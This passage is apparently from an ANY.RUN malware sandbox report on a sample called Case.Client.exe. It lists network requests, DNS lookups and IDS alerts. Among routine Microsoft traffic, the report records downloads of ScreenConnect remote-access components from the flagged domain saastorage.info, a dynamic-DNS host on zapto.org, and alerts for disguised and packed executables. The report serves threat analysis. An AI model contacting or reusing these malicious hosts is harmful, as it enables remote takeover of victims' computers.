184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
GET
200
173.211.46.170:443
https://saastorage.info/Bin/ScreenConnect.WindowsClient.exe.config
unknown
5112
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
GET
304
4.175.87.197:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
unknown
5112
SIHClient.exe
GET
200
23.48.23.140:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6744
dfsvc.exe
173.211.46.170:443
saastorage.info
ATT-INTERNET4
US
suspicious
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6744
dfsvc.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
5112
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5112
SIHClient.exe
23.48.23.140:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5112
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
google.com
  • 142.250.186.174
whitelisted
saastorage.info
  • 173.211.46.170
malicious
client.wns.windows.com
  • 172.211.123.249
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
crl.microsoft.com
  • 23.48.23.140
  • 23.48.23.156
  • 23.48.23.161
  • 23.48.23.147
  • 23.48.23.145
  • 23.48.23.153
  • 23.48.23.193
  • 23.48.23.141
  • 23.48.23.191
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted
myhostwin64.zapto.org
  • 173.211.46.170
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
Misc activity
ET INFO Packed Executable Download
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
A Network Trojan was detected
ET MALWARE Possible Windows executable sent when remote host claims to send html content
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DNS Query to DynDNS Domain *.zapto .org
4188
ScreenConnect.ClientService.exe
Misc activity
ET REMOTE_ACCESS ScreenConnect/ConnectWise Initial Checkin Packet M2
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Case.Client.exe